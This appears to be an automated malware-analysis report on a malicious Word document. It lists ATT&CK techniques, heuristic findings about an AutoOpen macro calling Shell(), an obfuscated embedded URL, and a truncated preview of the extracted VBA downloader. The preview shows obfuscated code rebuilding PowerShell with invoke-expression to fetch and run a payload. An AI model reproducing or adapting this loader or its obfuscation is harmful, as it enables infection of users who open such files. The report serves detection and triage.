Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload from the provided URL. The obfuscated nature of the script prevents a more detailed analysis of its exact actions.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://semiovi0Dq+0Dq.es/djt1nD+1nDJk0Dq+0Dqr (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21500 bytes |

SHA-256: b587e6ddce94e883889248d675e1aaaf79ed55ed2da0c2a47c7e028e32c2c18e
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "REInJfDWPYNBaV"
Function TLFjGXMVpvIXqw()
On Error Resume Next
XCbdaIbFn = 6872919 / CLng(TvzfudjXjOK) - 6256923 * Cos(6810925) + OjcpsPSwGBJVq + 7298287
skvrianSIo = 9013910 / CLng(dzhiMrcrL) - 1911548 * Cos(9229380) + zJnUm + 2623635
rpkvKzrTrpP = 782297 / CLng(viTUM) - 4111202 * Cos(7971175) + VZnucHlMwAiWDk + 5776988
DpoqfQJwjO = (ccfXwBWISiXYL) + HJjkJKD("jliaKUtROwwpvnpFfLQoPDR1nD+'+'1nD]3'+'6 -CrEPlAce([ChaR]1nD+1nD71+[Ch1nD+1nD2Qk+2Qk'+'aR]78+[ChaR]84)2Qk+2Qk,[CwwKPjfrrTHVj", 23, 89)
IRszjiobqj = 4241016 / CLng(fhwKElBwWsjj) - 8264456 * Cos(2079125) + kdqildr + 3937854
DRiviURrzMq = 4376708 / CLng(rLRmHYo) - 3663824 * Cos(9329844) + AtSptLYUJApvLp + 8316985
bmpiAk = 2667869 / CLng(skInMbwMZkL) - 2829911 * Cos(3901934) + NuNLqLAoZFWKW + 4736242
nOdhc = (iNWqChWmWBbrYa) + HJjkJKD("fWwpQfsCwSwPNtitqdLdVziLuHjwVVFbAR]98+[cHAR]102+[cHAR]97),'$').rEPLace(([cHAR]50+[cHAR]81+[cHAR]107),[striNg][cHAR]39)|iNVOke-EXPREsSIoNbIwTpjd", 33, 104)
PriBHoi = 693750 / CLng(DQCFXPZ) - 1550105 * Cos(3103869) + iwfGDYYoX + 3919701
mMCaT = 9574709 / CLng(RVOwwBwuqIsXk) - 8630501 * Cos(7202854) + wNvTzkL + 2082137
nRmGElitM = 9429009 / CLng(uFcNKjNLzjqbT) - 4492152 * Cos(1862576) + iVEHVLmLq + 1952687
SXrbzRwVu = (NFpHcAwdACh) + HJjkJKD("jlCmPoaYouY9-CrEPlAce ([ChaR]122+[Cha2Qk+2QkR]731nD+1nD+[ChaR'+']97),[ChaR]92) Iwx&2Qk+2Qk((VariaBLE 0Dq*MdR*0Dq).NamE[3,11nD+1nD2Qk+2Qk1,2]-jOIn0Dq0Dq)1nD).rEhDFhMsXYjnspost", 12, 148)
QTHjYpaVJTS = 8766061 / CLng(KbGpGpYjS) - 3152337 * Cos(4437744) + JjQTWmbRPQDBXv + 9475361
dnwBuzrvhis = 9252122 / CLng(hpUQBTTZ) - 3994582 * Cos(9564872) + dYaCFw + 9818433
SEffMQ = 5221910 / CLng(aijubH) - 8759569 * Cos(4717011) + SKscR + 6999069
zbJTPiVa = (cwIKZtEWW) + HJjkJKD("fJWz2Qk+ 0Dq+2Qk+2Qk0Dqt0IzIat0I + RFrN0Dq+0DqS0Dq+0DqB0Dq+0Dq 0Dq+0Dq+ (0Dq+0Dqt'+'0I.ex0Dq+0Dqt0I+t0Iet0I);for0Dq+01nD+1nDDqe0Dq'+'+0Dqa2Qk+2Qkch(RFr0Dq+1nD+1nNXnpOwFGYfjYiUjUY", 5, 157)
uZcUoFXE = 5073012 / CLng(UCnRAGqbCPqLMj) - 6446202 * Cos(8944966) + nQDXJtNWpZ + 7174653
rqYMvPpb = 3937137 / CLng(uOoCYzBAnk) - 9865969 * Cos(4912238) + JFKaLRLwBdWXK + 1583853
SZOwcHJzOC = 4841017 / CLng(LjFGZUbXKIiscz) - 6058782 * Cos(870048) + RkILOOTIhtlSiN + 8245571
iQCiTkqimst = (pAvYwWnrzGZot) + HJjkJKD("zoHtQq}}0Dq)-REp2Qk+2QklA2Qk+2QkcE 0DqRFr0Dq,[Cha1nD+1nDjDGCFvIcDwAkiwrOLPowzhahiPCzAoRpq", 6, 51)
hfdqjWHEVt = 8798546 / CLng(RjwSlwrbq) - 916465 * Cos(6018019) + rQYWbKfzviYzL + 7035002
zoMFDuc = 8033836 / CLng(qnAFTTL) - 3900763 * Cos(6255311) + IUbNnilIrCvf + 4265356
OAfToZ = 1479953 / CLng(vcmLwGAIikCEZ) - 5089569 * Cos(4688184) + EpqBK + 4267481
LhzcIKtjbYa = (jSTCzSZ) + HJjkJKD("QGCqYzKXLWmjUFf('.( bfaeNV:coMSpec[4,26,25]-JOin2Qk2Qk) ( (2Qk&'+'( Rb3SHELlID[1]+Rb3sHELlid[13]+1nDx1nD)((1nD ((0D2Qk+2QkqRF0D'+'q+0Dqrnsadasd 0Dq+0Dq= &(t0Int0I+t'+'0Iet01nD+1oXCl", 16, 162)
tnwMRGBcZE = 5744704 / CLng(iTwqpjG) - 6702491 * Cos(4954591) + wUmDHVLZlLNCh + 6166286
rRHtTITkUYj = 9072800 / CLng(KtwYEG) - 2401401 * Cos(117166) + ZobVlmcw + 9327385
hplwR = 5470713 / CLng(wbAqlEwRzflS) - 9191867 * Cos(6538245) + MkAppIlii + 6266086
LzbAlijZZ = (qYJifIMzdk) + HJjkJKD("rMrwnbAhaR]34 -CrEPlAce([C'+'haR]1071nD+1nD+[ChaR]104+[Ch2Qk+2QkaR]56),[ChaR]962Qk+2Qk-RE'+'plAc'+'E1nD+1nD 0Dqt0I0Dq,[ChaR'+'2Qk+2Qk]3Ewp", 8, 128)
JNFXSM = 1263638 / CLng(fKsSKBAwsMbA) - 2781995 * Cos(7843761) + lTbNpiNit + 8889702
zvGSTRB = 1893041 / CLng(QkzsH) - 5842586 * Cos(3262638) + BqbwmAICpN + 7512065
hZtEBpkm = 1591064 / CLng(RiGQjQERbwXAw) - 6899537 * Cos(2747123) + UUWzNUusdbpZL + 8602547
FcrlaJnm = (AHuCpnWfnQZsz) + HJjkJKD("NXXiSzLXmoRAOwijfq);2Qk+2Qk&(2Qk+2Qkt0D'+'q+0D'+'2Qk+2Q'+'kq00Dq+0Dq1nD+ntdZwKRfwwuTtiRbMHfwpj", 18, 55)
nUvRnQzZR = 2071707 / CLng(wjOnIbiGjS) - 3206985 * Cos(9751071) + kIztwJkEvCo + 6187063
TnTWA = 7193568 / CLng(iCXmq
... (truncated)